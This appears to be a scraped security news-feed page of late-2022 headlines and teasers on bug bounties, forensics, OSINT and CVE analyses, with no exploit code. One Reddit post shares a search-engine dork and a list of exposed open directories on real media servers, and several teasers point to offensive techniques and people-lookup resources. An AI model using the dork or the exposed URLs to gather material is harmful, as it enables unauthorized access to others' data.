    Good day, my name is Eduzor Kamsi and today I'll walk you through the GrabThePhisher posted on CyberDefenders. Continue reading on Medium »
    OSINT — Видео на YouTube
    YouTube Metadata — метаданные. Обычные метаданные YouTube собирают отдельные детали о видео и его загрузчике, плейлисте и его создателе… Continue reading on Medium »
  • Open

    Explaining vulnerabilities : Template Injections (Server-Side) {Bug bounties}
    What are template engine injection vulnerabilities? Continue reading on Medium »
    [Hacking Bank] The Second Story of Finding Critical Vulnerabilities on Banking Application
    This is new story about reversing a banking application that use “Xamarin” platform , bypass the integrity of the requests and finding… Continue reading on Medium »
    WebView XSS, account takeover
    DALL-E prompt: Medium story preview picture for a blog on cybersecurity but with robots Continue reading on Medium »
    A great weekend hack(worth $8k)
    This post is a writeup of my recent findings on Synack which got me $8k for 5 bugs, on a single day. Continue reading on InfoSec Write-ups »
    Hacking Dutch Government-Broken Authentication To Full Website Takeover (P1)
    Hey guys , Continue reading on System Weakness »
    How I hacked into a government e-learning website
    DATE: 07/11/2022 Continue reading on InfoSec Write-ups »
  • Open

    Exploiting an N-day vBulletin PHP Object Injection Vulnerability
    submitted by /u/eg1x [link] [comments]
    So, you want to get into bug bounties?
    submitted by /u/Mempodipper [link] [comments]
    Exploiting CORS Misconfigurations
    submitted by /u/6W99ocQnb8Zy17 [link] [comments]
  • Open

    SecWiki News 2022-11-26 Review
    CVE-2022-42920 BCEL 任意文件写漏洞 by 路人甲 美国开源软件安全评价方法体系分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-26 Review
    CVE-2022-42920 BCEL 任意文件写漏洞 by 路人甲 美国开源软件安全评价方法体系分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    Why is Digital Forensics seemingly one of the most underpaid fields in the whole of IT?
    Firstly I'll preface this by saying I live and work in the UK so it may just be a country specific thing, but it seems to me that DF is massively underpaid when compared to other cyber security jobs especially considering the responsibilities we take on as expert witnesses and the things we are exposed to on a day-to-day basis. I am a DFI in LE with 6 years experience currently earning in the mid 30's PA and it seems like I am doing better than a lot of my colleagues at other forces. It also seems as though pay isn't that great in the private sector so it doesn't seem to be a problem exclusive to the public sector. All job adverts I have seen recently ask for experienced investigators but none of them pay anywhere near what SOC jobs would pay for a similarly experienced SOC analyst. I guess I'm just fed up and venting but I am looking for advice because I can no longer continue working in an industry with minimal pay, no progression and exposure to things that take a toll on my mental health. Maybe a transition into a cyber role is what I need but I feel as though my knowledge and skills so specific to DF that they won't transition over. Thanks for reading submitted by /u/sam0320 [link] [comments]
    Analysing my mobile device for coursework using a logical image on Autopsy, 2 sets of device information?
    Apologies for the poor picture. I am doing coursework where I do an analysis of my device. I have the Google Pixel 2. I have crossed out some information but these are 2 screenshots in my word document where I am writing my report on the analysis. I've found 2 sets of device information. Google Pixel 2 information and Samsung Galaxy Alpha SM-G850F information. I don't own a Samsung Galaxy Alpha. Would anyone be able to tell me why this information is in my logical image? Thank you for your time. submitted by /u/ghostmale37 [link] [comments]
  • Open

    Clear Logs in Hacked System
    Introduction Continue reading on Medium »
  • Open

    Is there any tool to extract and list all files and their URLs from an open directory? Hope to get a solution from here :)
    submitted by /u/gingerteaforthesoul [link] [comments]
  • Open

    Exception logging in Sharepoint app reveals clear-text connection details
    Nextcloud disclosed a bug submitted by kichernde_erbse: https://hackerone.com/reports/1652903
    CVE-2022-42915: HTTP proxy double-free
    curl disclosed a bug submitted by bagder: https://hackerone.com/reports/1722065
    CVE-2022-32221: POST following PUT confusion
    curl disclosed a bug submitted by robbotic: https://hackerone.com/reports/1704017
    Profile of disabled user stays accessible
    Nextcloud disclosed a bug submitted by mikaelgundersen: https://hackerone.com/reports/1675014 - Bounty: $100
    Database resource exhaustion for logged-in users via sharee recommendations with circles
    Nextcloud disclosed a bug submitted by michag86: https://hackerone.com/reports/1688199 - Bounty: $250
  • Open

    路漫漫:网络空间的监管趋势
    今年,国际关系的持续紧张态势无疑对网络空间和网络安全都产生了重大影响。以下是卡巴斯基对网络空间发展趋势的观察结果。

  • Open

    Explaining vulnerabilities : File inclusion {Bug bounties}
    File inclusion vulnerabilities are part of the OWASP top ten. In this article, I’ll explain what they are,how to find them, how to exploit… Continue reading on Medium »
    How I Got the Hall of Fame in Few minutes
    Hello Awesome INFOSEC COMMUNITY, I hope you all doing well! This Write-up is about how I got the hall of fame in few minutes. Today I’m… Continue reading on Medium »
    P1 Bug — Leaked Zendesk Token in GitHub
    Version en Español Continue reading on Medium »
    Bug Zero at a Glance [Week 19–25 November]
    What happened with Bug Zero? Continue reading on Bug Zero »
    P1 Bug Hunting — Exploiting Common Wordpress Vulnerabilities
    TL;DR- Some great tips on pen-testing Wordpress sites, finding common misconfiguration exploits and great vulnerabilities for bug bounties. Continue reading on The Gray Area »
    Explaining vulnerabilities : OS command injection {Bug bounties}
    Injection is one of the most impactful and severe bugs that can be found on a web application, falling right under broken access control… Continue reading on Medium »
  • Open

    Encase- Index search issue
    Hello, I have created a .L01 image of a .PST file and need to perform searches. I ran the processor option 'index text and metadata', the job completed successfully according to Processor Manager. However, when I attempt to search using the index, I get zero hits. I know for a fact these words appear in the data since I also ran a keyword search through the processor which provided matches. Any ideas what the issue might be? Thanks! submitted by /u/forvestic [link] [comments]
    Unallocated file date accuracy (TSK)
    Good morning! I'm working on my project and I found a file that is a solid indicator of compromise. Filename is a hash, it shows as an application/octet-stream and has path c:/Users/$user/AppData/Local/Packages/Microsoft.Windows[...]. In other words, it does not say orphan. The date shown on Autopsy for created, accessed, changed,and modified show as the same (sometime in the spring). How confident can I be about this date? If it's correct, it would signal that the system compromise goes back to the spring. However, I'm not sure how I can assess how valid this date is. I saw it has been mentioned that I could open it with a hex editor and carve/offset items? This is my first project and I do not have a solid grasp of those concepts yet. Thank so much for the assistance! I have hardly slept trying to figure these things out. submitted by /u/JimmyMcTrade [link] [comments]
    Not sure where to begin
    TL;DR: I want to drop out of my Master's program and switch to a digital forensic based future, but I'm not sure what my best options are. So. A quick bit of background. I graduated in 2014 with a Bachelor's degree in Forensic Science. I started working as a Crime Scene Investigator, and did that for 3 years before a position opened at my agency to switch to the Real Time Crime Center (RTCC) as a Crime Analyst. I took the position there because it paid better, but still applied for lab positions on the side with my state police crime labs whenever I could. I couldn't stand the work at RTCC, and my old college reached out to me stating that they were set to start their Master's program soon. In my head, I could continue at RTCC while I did the Master's program and then move on, since the…
  • Open

    SSRF mitigation bypass using DNS Rebind attack
    Concrete CMS disclosed a bug submitted by adrian_t: https://hackerone.com/reports/1369312
    open redirect to a remote website which can phish users
    Concrete CMS disclosed a bug submitted by adrian_t: https://hackerone.com/reports/1397804
    SSRF - pivoting in the private LAN
    Concrete CMS disclosed a bug submitted by adrian_t: https://hackerone.com/reports/1364797
    XSS in Desktop Client in call notification popup
    Nextcloud disclosed a bug submitted by mikeisastar: https://hackerone.com/reports/1711847
    XSS in Desktop Client via user status and information
    Nextcloud disclosed a bug submitted by mikeisastar: https://hackerone.com/reports/1707977
    XSS in Desktop Client in the notifications
    Nextcloud disclosed a bug submitted by mikeisastar: https://hackerone.com/reports/1668028 - Bounty: $750
  • Open

    How do you follow up for clarification with Google's bughunters system if they closed the case?
    How do you follow up for clarification with Google's bughunters system if they closed the case? See my previous post here and on cryptocurrency for the preface to this. A report was made on the suspicious timing coincidence of granting a popular Google Play app Google identification instead of Facebook or email sign up. This was the reply received from Google bug hunters program "Status: Won't Fix (Intended Behavior) Hi! Thank you for contacting us. We've determined that what you're reporting is not a technical security vulnerability. As we won't be able to act on your report, we have closed the case – from now on, we won't be able to see any of your responses. " Needless to say we're both a little flabbergasted that such a detailed report involving the theft of some cryptocurrency from somebody's Google drive which apparently occurred after a Play store app was given Google normal identification sign up privileges was dismissed as intended behavior. Anyway do you have to open another issue or bug report to get clarification on whether they mean that it is intended behavior for any app that you say sign up with using Google sign up is able to access all files on your Google drive if they want to? I mean I would find that a little shocking if that is the intended behavior but if it is they sure as hell need to tell a lot of people about it. And since the issue was closed and they say they won't see any more responses to this issue I'm wondering how to get clarification on that. submitted by /u/GWtech [link] [comments]
    How many courses do you need to complete to become a pen tester?
    Hi. I’m curious as into how many courses in hack the box academy I have to complete in order to become a pen tester. What are all of the courses recommended in hack the box academy to be a pen tester? submitted by /u/AlternativeNo5023 [link] [comments]
    How do I write a "project proposal" for a security-conscious enterprise company to open internal Web access on their internal cloud?
    I use NetBox which is a Django 3.3 app to inventory our department's network equipment. I need to productionize this so other people in our department can access this and use it on our company's internal cloud. Unfortunately when I tried to deploy it on our internal cloud, the corporate security controls came in. I'm a contractor and the fleeting advice I got from the FTE was "write a project proposal." I have no idea what a "project proposal" looks like in this context but I have some ideas of its components. i just want holes poked in the firewall to access my webapp barfing out what netbox does which seems explanatory but not Oauthing (oof) it into the company security certificates vm updates, django updates??, transport security between the DB and the Web server even tho that's given to us I have no idea what a "project proposal" looks like in these circumstances and I have no idea how to write this down in a way that makes sense. submitted by /u/combuchan [link] [comments]
    How to put all the achievement I have done at work on my resume?
    My performance reviews is next months. I may go find a new position if my salary raise is not good enough especially I am doing a fantastic job this year. Anyway I am working at a bank right now as a application penetration tester. I have discovered two very critical findings this year for the bank (OS Injection and IDOR allow me login to any user account) I also did a very very great job of taking care the bank VDP and BBP program on hackerone. And i also got three CVE this year when pentesting the bank application. I want to put all these in my resume but I have no idea how to... Can someone help me out pls~~~ Resume: https://imgur.com/CrTUMns Edit: grammer submitted by /u/No-job-no-money [link] [comments]
  • Open

    [LIVE Nov 25, 2022 11AM PT] Off By One Security : Introduction to Linux Heap Exploitation
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    How Much Shuffling Can You Watch?
    submitted by /u/surftamer [link] [comments]
  • Open

    SecWiki News 2022-11-25 Review
    图视角下的信息抽取技术研究 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-25 Review
    图视角下的信息抽取技术研究 by ourren 更多最新文章,请访问SecWiki
  • Open

    Containers: Rootful, Rootless, Privileged and Super Privileged
    submitted by /u/fcano1 [link] [comments]
  • Open

    Ice — THM(easy)
    Sequel to blue, is a windows machine with poorly configured settings. Continue reading on Medium »
    Blue — THM(easy)
    Blue is a windows hacking room for complete beginners and here I’ll walk you through the steps i followed to hack into this machine. Continue reading on Medium »
  • Open

    P1 Bug — Leaked Zendesk Token in GitHub
    Version en Español Continue reading on Medium »
    OSINT — Поиск информации о гражданах республики Беларусь.
    Сведения из Государственного реестра плательщиков — сведения из гос. реестра плательщиков, такие как УНП и код инспекции. Continue reading on Medium »
  • Open

    Vulnerability disclosure that saved $100M worth of crypto
    Article URL: https://twitter.com/orenyomtov/status/1595815245666086913 Comments URL: https://news.ycombinator.com/item?id=33742541 Points: 2 # Comments: 0
  • Open

    FuzzingWeekly CW 47
    Till REcollapse — Fuzzing the web for mysterious bugs: https://0xacb.com/2022/11/21/recollapse/ Continue reading on Medium »
  • Open

    FuzzingWeekly CW 47
    Till REcollapse — Fuzzing the web for mysterious bugs: https://0xacb.com/2022/11/21/recollapse/ Continue reading on Medium »
  • Open

    FreeBuf周报 | 英国与韩国达成数据传输协议;亚航空500万乘客和员工信息被盗
    各位 Buffer 周末好,以下是本周「FreeBuf周报」,我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    FreeBuf早报 | 网安成熟度影响企业收入增长率;缺乏数字信任致近半数客户抛弃供应商
    英国已经完成脱欧后的第一个独立数据保护决议,这将允许英国在今年年底之前不受限制地将个人数据安全地转移到韩国。
    如何使用stegoWiper破坏基于隐写术的恶意软件攻击
    在最近这十年中,很多网络威胁组织都在使用基于隐写术的恶意软件或相关隐写技术来攻击全球范围内各个地区的不同部门和组织。
    以“安全风险”为由,英国停用中国监控摄像头,外交部回应
    外交部回应,中方坚决反对一些人泛化国家安全概念,无理打压中国企业。
    一道Android题目逆向动态调试
    题目来源于海淀区网络与信息安全管理员大赛,题目中将加密验证算法打包进.so,在程序中动态调用check。
    网络犯罪猖獗,国际刑警组织截获价值 1.3 亿美元的资产
    在一项全球打击网络金融犯罪和洗钱活动中,国际刑警组织逮捕近1000名嫌疑人并扣押了价值1.3亿美元的虚拟资产。
    从JDK源码中探究Runtime#exec的限制
    前言遇到很多次在调用Runtime.getRuntime().exec方法进行弹shell的时候遇到的各种限制,都没好好的认识认识原理,这次主要是总一个总结和原理上的分析环境搭建之后使用docker起一个具有反序列化的漏洞的Java服务(能够执行命令就行)之后开启调试的功能我这里直接就是用存在的weblogic的漏洞环境,直接通过发送T3协议数据包来触发反序列化漏洞起因我这里使用的是CVE-202
    WhatsApp数据大泄露,近5亿条用户号码在暗网出售
    据Cybernews报道,有黑客正在地下论坛出售近5亿WhatsApp用户的最新手机号码,而通过检验数据库样本,这些数据极有可能是真实数据。
    英国与韩国完成脱欧后首个独立数据传输协议
    到 2022 年底,英国能不受限制的将个人数据传输到韩国。
  • Open

    FuzzingWeekly CW47: Fuzzing the web for mysterious bugs
    Article URL: https://ioc.exchange/@FuzzingWeekly/109403898711416700 Comments URL: https://news.ycombinator.com/item?id=33740976 Points: 1 # Comments: 0
  • Open

    From CloudSec to Web3 Security, Bug Bounties to DFIR, and More: 15 Power-Packed Talks at IWCON2022
    No content preview
  • Open

    From CloudSec to Web3 Security, Bug Bounties to DFIR, and More: 15 Power-Packed Talks at IWCON2022
    No content preview
  • Open

    From CloudSec to Web3 Security, Bug Bounties to DFIR, and More: 15 Power-Packed Talks at IWCON2022
    No content preview

  • Open

    What do pen testers wear to their jobs?
    Hi. I want to become a pen tester after college, and I would like to know what is the dress code for them? Especially if it’s working on site, or in the office, or even remote. submitted by /u/AlternativeNo5023 [link] [comments]
    Is it normal for phone camera indicator to turn on after startup? (Android 12)
    hey guys, I recently noticed that my phone's (android 12) video camera indicator always flashes on briefly before turning off, a few minutes after I turn my phone on. Does this happen for anyone else or should I be concerned about this? Sorry I would have asked this in another sub if possible but I didn't know of one that pertained to android security. submitted by /u/No_Trash_9832 [link] [comments]
    Hacker Playbook, Where Do I Start?
    So I am new to this and was told that I should look into Hackers Playbook as a good starting point. But I noticed there are three and wanted to ask if what would be the best book to start with. submitted by /u/Baromis [link] [comments]
    If you are signed into a restaurants public wi-fi can other people signed into that same wifi network sees what's inside your android phone or Chromebook?
    If you are signed into a public wi-fi like at a restaurant, can other people signed into that same wifi network sees what's in the files in your android phone or Chromebook? I always assumed people could sniff your post headers (if that they are called) but web traffic was https encrypted when it left your phone and there was definitely no way one could actually see the FILES on your phone. submitted by /u/GWtech [link] [comments]
    A text file was read either from an Android phone or from a Google drive when a chromium book and a android phone were on a partly public Wi-Fi. Need to figure out how that happened and how to protect against it?
    A text file was read either from an Android phone or from a Google drive when a chromium book and a android phone were on a partly public Wi-Fi. Need to figure out how that happened and how to protect against it? My friend lost a small amount of Bitcoin because in the text file was a very old address with a private key. That's how he knows the file was read. And he nlonows exactly when the Bitcoin transfer happened. It wasn't a large financial loss but he's freaked because he wants to know if someone's able to read his Google drive or read text on his phone when he's on a public wi-fi. The Chromebook had access to his Google drive and his Android phone had access to his Google drive and the Android phone and the Chromebook were Google linked together. There may have been a time when they…
  • Open

    Write-up: Authentication bypass via information disclosure @ PortSwigger Academy
    No content preview
    Defending against ransomware in the Cloud
    Is the Cloud more or less secure against ransomware ? Continue reading on InfoSec Write-ups »
    THE ANATOMY OF KERBEROS AUTHENTICATION (AD BASICS 0x1)
    No content preview
  • Open

    Write-up: Authentication bypass via information disclosure @ PortSwigger Academy
    No content preview
    Defending against ransomware in the Cloud
    Is the Cloud more or less secure against ransomware ? Continue reading on InfoSec Write-ups »
    THE ANATOMY OF KERBEROS AUTHENTICATION (AD BASICS 0x1)
    No content preview
  • Open

    Write-up: Authentication bypass via information disclosure @ PortSwigger Academy
    No content preview
    Defending against ransomware in the Cloud
    Is the Cloud more or less secure against ransomware ? Continue reading on InfoSec Write-ups »
    THE ANATOMY OF KERBEROS AUTHENTICATION (AD BASICS 0x1)
    No content preview
  • Open

    Moto E20 Readback Vulnerability
    Article URL: https://www.pentestpartners.com/security-blog/moto-e20-readback-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=33735392 Points: 1 # Comments: 0
  • Open

    OSINT automation: using сustom functions for working with API requests in Google Sheets
    One of the main methods of automating OSINT is to use various APIs. Continue reading on Medium »
    OSINT — Поиск корабля
    Continue reading on Medium »
  • Open

    SecWiki News 2022-11-24 Review
    BAS那点事儿 by ourren Android组件安全之drozer实战 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-24 Review
    BAS那点事儿 by ourren Android组件安全之drozer实战 by ourren 更多最新文章,请访问SecWiki
  • Open

    HackerOne Advises Users to Safeguard From Legal Issues
    Want to Know How? Continue reading on Bug Zero »
    Web Application Bug Bounty Hunting LAB Setup Guide — Web Hacking Tutorial
    #ethicalhWeb application vulnerabilities involve a system flaw or weakness in a web-based application.Create A Hacking Bug Bounty Hunting… Continue reading on Medium »
    Html File Upload Lead to A.T.O in Indonesian Government Site
    Hello Hunters 👋, perkenalkan saya adalah seorang Bug Hunter, saya hanya mencari celah atau bug disaat saya mempunyai waktu luang saja Continue reading on Medium »
    OAuth and the flaws in its implementation
    What is OAuth? Continue reading on Medium »
    Deploying an AWS S3 static site to use Cloudflare WAF
    Prerequisites Continue reading on Medium »
  • Open

    Developing SMB stager in Nim
    Hello fellow Red Teamers. I recently started getting in touch with Nim for offensive coding. To be honest I find it difficult and strange… Continue reading on Medium »
  • Open

    FreeBuf早报 | 亲俄组织窃取了五千万个密码;CISA 更新指南提高基础设施的弹性
    在亲俄黑客组织 Killnet 的一部分 Anonymous Russia 声称发起 DDoS(分布式拒绝服务)攻击后,欧洲议会的网站已被关闭。
    罕见操作,Meta封禁多个美国军方小号
    近日Meta已经封禁了多个美国军方的小号,其中包括Facebook/Instagram等社交平台上的账号。
    鹏城相聚,精彩继续!CIS 2022大会(深圳会场)成功举办
    来自全国各地的演讲嘉宾和参会观众共聚一堂,面对面交流网络安全领域的前瞻思考、心得体会。
    欧盟宣布俄罗斯为恐怖主义国家之后,欧洲议会网站被黑
    立法机构宣布俄罗斯为恐怖主义国家几小时后KillNet发动 DDoS 攻击,关闭了欧洲议会的网站。
  • Open

    Sigstore The Easy Way
    submitted by /u/Rewanth_Tammana [link] [comments]
    2022 InfoSec Black Friday Deals
    submitted by /u/Fugitif [link] [comments]
  • Open

    Apache OFBiz CVE-2021-29200 反序列化漏洞分析
    作者:墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/cJ65VXdHzSelIptJ5TIW_A 漏洞简述 2021年3月24日,墨云安全V-Lab实验室向Apache官方报告了OFBiz产品的反序列化漏洞,2021年4月28日Apache OFBiz发布了致谢信息。 时间线 2021年3月24日向Apache OFBiz报告了此漏洞 202...
  • Open

    Apache OFBiz CVE-2021-29200 反序列化漏洞分析
    作者:墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/cJ65VXdHzSelIptJ5TIW_A 漏洞简述 2021年3月24日,墨云安全V-Lab实验室向Apache官方报告了OFBiz产品的反序列化漏洞,2021年4月28日Apache OFBiz发布了致谢信息。 时间线 2021年3月24日向Apache OFBiz报告了此漏洞 202...
  • Open

    What cloud collection applications do you use?
    As above. Looking at a solution to pull cloud data (Google Takeout, WhatsApp, icloud etc) submitted by /u/Genzlol [link] [comments]
    Advice for GCFE
    As the title says - I have 3+ years of experience in the field, and for the first time I am approaching one of the SANS Certification. Any advice on how to study for it? Are there any tips I should know/I could use to improve my study? Not looking for cheating, but rather to optimize my time. Thanks submitted by /u/RobertJCorcoran [link] [comments]
    A good private investigation firm that handles national cases and does computer forensics?
    I have a police misconduct case for which I need services from technology professionals to help investigate. Can anyone recommend anyone? submitted by /u/bluemoss_co [link] [comments]
  • Open

    CGI::Cookie
    Ruby disclosed a bug submitted by htokumaru: https://hackerone.com/reports/1204977
    RubyCGIHTTPHTTP
    Ruby disclosed a bug submitted by htokumaru: https://hackerone.com/reports/1204695

  • Open

    CRTL - RTO2 Course/Exam Review
    submitted by /u/roobixx [link] [comments]
    Linux Password Mining - Extract passwords from files and memory
    submitted by /u/Clement_Tino [link] [comments]
  • Open

    3rd party app to read MS Teams?
    Anyone know of a third party application that can view MS Teams chat? I have a handful of drive images and can see remnants from an .ldb file in the user profile (found during keyword search using Encase). I've had some success using Axiom, but was wondering if there's another tool available. I do not have access to any cloud repositories, so I'm sure I'll only see temp or cache leftovers, but anything helps. submitted by /u/IDrinkMyBreakfast [link] [comments]
    AFF4 extension for X-Ways stable?
    Hey folks, I've seen, that X-Ways supports the AFF4 format through the I/O API. The mentioned release af https://github.com/aff4/aff4-cpp-lite/releases/tag/v2.1.1-pre is rather old. My question is: is it stable and safe enough to use it on a daily basis for production? Do you have experience with it? Thanks in advance! submitted by /u/Reliable-Crux [link] [comments]
    What is unallocated $orphan file data ?
    Good morning! I've been learning a lot about digital forensics lately. I made a little test case for myself using VMs and I have a question that I cannot find the answer to. I did an ingest and analysis for a disk using Autopsy. I did a keyword search for a suspect IP of a C2 server. I got many hits in autopsy. One of them is the name OUTLMIME.DLL and it's location is in img_c:/$OrphanFiles/OUTLMIME.DLL; this shows as unallocated. Strings output shows the IP along with other important information like user contact info. Created time shows October. Modified time shows a month later. Question: I would basically like to understand what this means. The Orphan file contains many bits of data in its Strings. Does this all come from a single file or are these strings coming from different files that were present in the disk space and now all smushed together in this unallocated orphan file? Is the date accurate or relevant? I mean, could I say that in October, I observed that there was a file with data suggesting that a malicious IP was contacted and that personal information may have been sent? So many questions, but this would be a very helpful start. Thank you so much! submitted by /u/JimmyMcTrade [link] [comments]
  • Open

    Investigating a backdoored PyPi package targeting FastAPI applications
    submitted by /u/thorn42 [link] [comments]
    A dive into Microsoft Defender for Identity
    submitted by /u/jeandrew [link] [comments]
    Nighthawk: An Up-and-Coming Pentest Tool Likely to Gain Threat Actor Notice
    submitted by /u/CyberMasterV [link] [comments]
    Bringing PAC to x86 with custom microcode
    submitted by /u/Gallus [link] [comments]
  • Open

    On the Wire — Hacktoria Contract Walkthrough
    In this article, we are going to solve an OSINT challenge from Hacktoria called as “On the Wire”. Continue reading on Medium »
    Create Sock Puppet Profile For OSINT Investigation
    It’s been a while since my last post in this blog. Two years back I got lost in OSINT so I’ll post here what I’ve learn so far. Continue reading on Medium »
    OSINT — Поиск информации о гражданах России
    Нахождение в розыске https://www.interpol.int/notice/search/wanted https://mvd.ru/wanted http://fsin.su/criminal/… Continue reading on Medium »
    OSINT — Поиск информации о гражданах Украины
    Нахождение в розыске https://www.interpol.int/notice/search/wanted https://ssu.gov.ua/u-rozshuku https://wanted.mvs.gov.ua/… Continue reading on Medium »
    ‍OSINT — Поиск и анализ объекта по изображению, фото или лицу.
    Фотография пользователя также может быть использована для идентификации личности путем ее сопоставления с существующими базами… Continue reading on Medium »
    OSINT — Сервисы по пробиву автомобилей
    VIN01 — найдет VIN и по нему покажет историю регистраций, историю ДТП, пробег, ОСАГО и многое другое. Continue reading on Medium »
    OSINT — поиск информации о гражданине/компании Киргизии
    register.minjust.gov.kg — электронная база данных юр. лиц от Министерства юстиции. Continue reading on Medium »
    Поиск поезда
    OpenRailwayMap — подробная онлайн-карта мировой железнодорожной инфраструктуры. Continue reading on Medium »
    Early warning system social media: Video stream documents live animal cruelty and domestic violence
    Live on the video streaming platform Twitch, a teenager abuses his mother, is abused himself, and then goes after his cat. The details… Continue reading on Medium »
    The rise of Sweden as Europe’s gun crime capital
    Sweden is often perceived as a safe place, with a low crime rate and progressive politics, this is, however, a misconception. Continue reading on Medium »
  • Open

    How To Exploit CSRF In DVWA — StackZero
    No content preview
    3 Videos About Web3 Hacking to Fast-Forward Your Cybersecurity Journey
    No content preview
  • Open

    How To Exploit CSRF In DVWA — StackZero
    No content preview
    3 Videos About Web3 Hacking to Fast-Forward Your Cybersecurity Journey
    No content preview
  • Open

    How To Exploit CSRF In DVWA — StackZero
    No content preview
    3 Videos About Web3 Hacking to Fast-Forward Your Cybersecurity Journey
    No content preview
  • Open

    SecWiki News 2022-11-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Top 10 Security Tools for Bug Bounty Hunters
    Bug bounty hunting is a career that is known for the heavy use of security tools. These tools help hunters to find weaknesses and… Continue reading on Medium »
    Git Exposed — Um breve overview da vulnerabilidade.
    No momento que atacamos uma aplicação em um pentest black box, bug bounty ou em CTF’s, nós não conseguimos ler o código-fonte do back-end… Continue reading on Medium »
    Mt Pelerin Double Transaction Bugfix Review
    Summary Continue reading on Immunefi »
    BITRA Comes To Azbit
    BITRA is the native currency of the BugSpace cybersecurity project. The team provides bug hunting services to large companies, ensuring… Continue reading on Azbit News »
    How To Exploit CSRF In DVWA — StackZero
    This tutorial will show you how to exploit a CSRF vulnerability in the DVWA. You will learn some techniques to inject a malicious form Continue reading on InfoSec Write-ups »
  • Open

    Some movies, series and animation till 2020.
    submitted by /u/eewo [link] [comments]
    ~11K Fonts
    submitted by /u/flappy-doodles [link] [comments]
    1000's of American Football Related Videos, in 27 OD's
    These are all from the same domain but I couldn't find a centralized index, (akamaized dot net server not found). Some have got thousands of directories, (mainly videos), while others appear empty. Some shared dupes too, but I only scratched the surface. I lumped these ones together as they're all American football teams, but using this search string, site:.akamaized.net intitle:"Index of/" I found some other results that I haven't checked out yet. https://aricardinals.akamaized.net/ Arizona Cardinals https://atlfalcons.akamaized.net/ Atlanta Falcons https://balravens.akamaized.net/ Baltimore Ravens https://bufbills.akamaized.net/ Buffalo Bills https://carpanthers.akamaized.net/ Carolina Panthers https://chibears.akamaized.net/ Chicago Bears https://cinbengals.akamaized.net/ Cincinnati Bengals https://clebrowns.akamaized.net/ Cleveland Browns https://detlions.akamaized.net/ Detroit Lions https://denbroncos.akamaized.net/ Denver Broncos https://gbpackers.akamaized.net/ Green Bay Packers https://houtexans.akamaized.net/ Houston Texans https://indcolts.akamaized.net/ Indianapolis Colts https://jaxjaguars.akamaized.net/ Jacksonville Jaguars https://kcchiefs.akamaized.net/ Kansas City Chiefs https://larams.akamaized.net/ Los Angeles Rams https://oakraiders.akamaized.net/ Las Vegas Raiders https://miadolphins.akamaized.net/ Miami Dolphins http://nepatriots.akamaized.net/ New England Patriots https://nosaints.akamaized.net/ New Orleans Saints https://nyjets.akamaized.net/ New York Jets https://nflukent.akamaized.net/ NFL UK (looks empty) https://phieagles.akamaized.net/ Philadelphia Eagles https://pitsteelers.akamaized.net/ Pittsburgh Steelers https://sf49ers.akamaized.net/ San Francisco 49ers https://tbbuccaneers.akamaized.net/ Tampa Bay Buccaneers https://wasredskins.akamaized.net/ Washington Commanders (Redskins) submitted by /u/little_maggot [link] [comments]
  • Open

    DoS via Playbook
    Mattermost disclosed a bug submitted by vultza: https://hackerone.com/reports/1685979 - Bounty: $300
    DoS via Automatic Response Message
    Mattermost disclosed a bug submitted by vultza: https://hackerone.com/reports/1680241 - Bounty: $300
  • Open

    Username/password scanner for network share
    Good day, We found some files within our share that had creds of users... Does any scripts or softwares exist to scan network share for possible credentials stored in clear text? I'm sure everyone is in the same boat... Even if you do awareness, it is so easy for them to stick the user/pw within a notepad... ;) Thanks for any tips in clearing out our shares! submitted by /u/unm3 [link] [comments]
    What are somethings that can be automated for SOC analysts?
    I have an interview coming up and they want someone who can help them be more efficient with automation. What would be examples of things a SOC would need to be automated? submitted by /u/murderkarma [link] [comments]
    System for cybersecurity homelab
    Currently I’m working as sysadmin with about 4 yrs of exp and planning to shift to cybersec/networksec. Planning to get a refurbished dell optiplex 3040 i3 6th gen or should I go for optiolex 3020 i5 4th gen at same price for running tools for learning purpose. Since i still need to start not sure if it will be able to handle but since mini pc is available currently so planning to have one in inventory. submitted by /u/beingbaban [link] [comments]
    Lab network question
    So I have a fairly beefy Intel NUC that i'm using as a lab machine. Last upgrade I needed to make was on the SSD and i'm doing that. This is for a group so we can bring it to group events for people to mess around with. I've ran something similar before and had issues when we tried to get a number of people attacking on the same network. I'm wondering, for anyone who has done anything like that, how many hosts can you get attacking before the network gets bogged down? I think it was the network vice the machines themselves. I'm guessing it's going to depend on the network hardware but IDK. submitted by /u/sephstorm [link] [comments]
  • Open

    CVE-2022-42889 Apache Commons Text RCE 漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/5B8MjKNB9UrsV6D-dKwTng 前言 最近一直在对刚研发出来的自动化Web/API漏洞Fuzz的命令行扫描工具进行维护更新(工具地址:https://github.com/StarCrossPortal/scalpel),目前扫描工具已更新至第三个版本,新增了5条202...
  • Open

    CVE-2022-42889 Apache Commons Text RCE 漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/5B8MjKNB9UrsV6D-dKwTng 前言 最近一直在对刚研发出来的自动化Web/API漏洞Fuzz的命令行扫描工具进行维护更新(工具地址:https://github.com/StarCrossPortal/scalpel),目前扫描工具已更新至第三个版本,新增了5条202...
  • Open

    OSINT automation for hackers
    BBOT is a recursive, modular OSINT framework inspired by Spiderfoot and written in Python. Continue reading on Medium »

  • Open

    Places to find a mentor?
    Does anyone have any resources or places to possibly find a mentor for the IR space? I’m an early professional, and started on an IR team a few months ago and am looking for a mentor to guide me more of the technical aspects of DFIR. Thanks! submitted by /u/hoolahoop222 [link] [comments]
    Workflows / Organization / Tools of Found Data
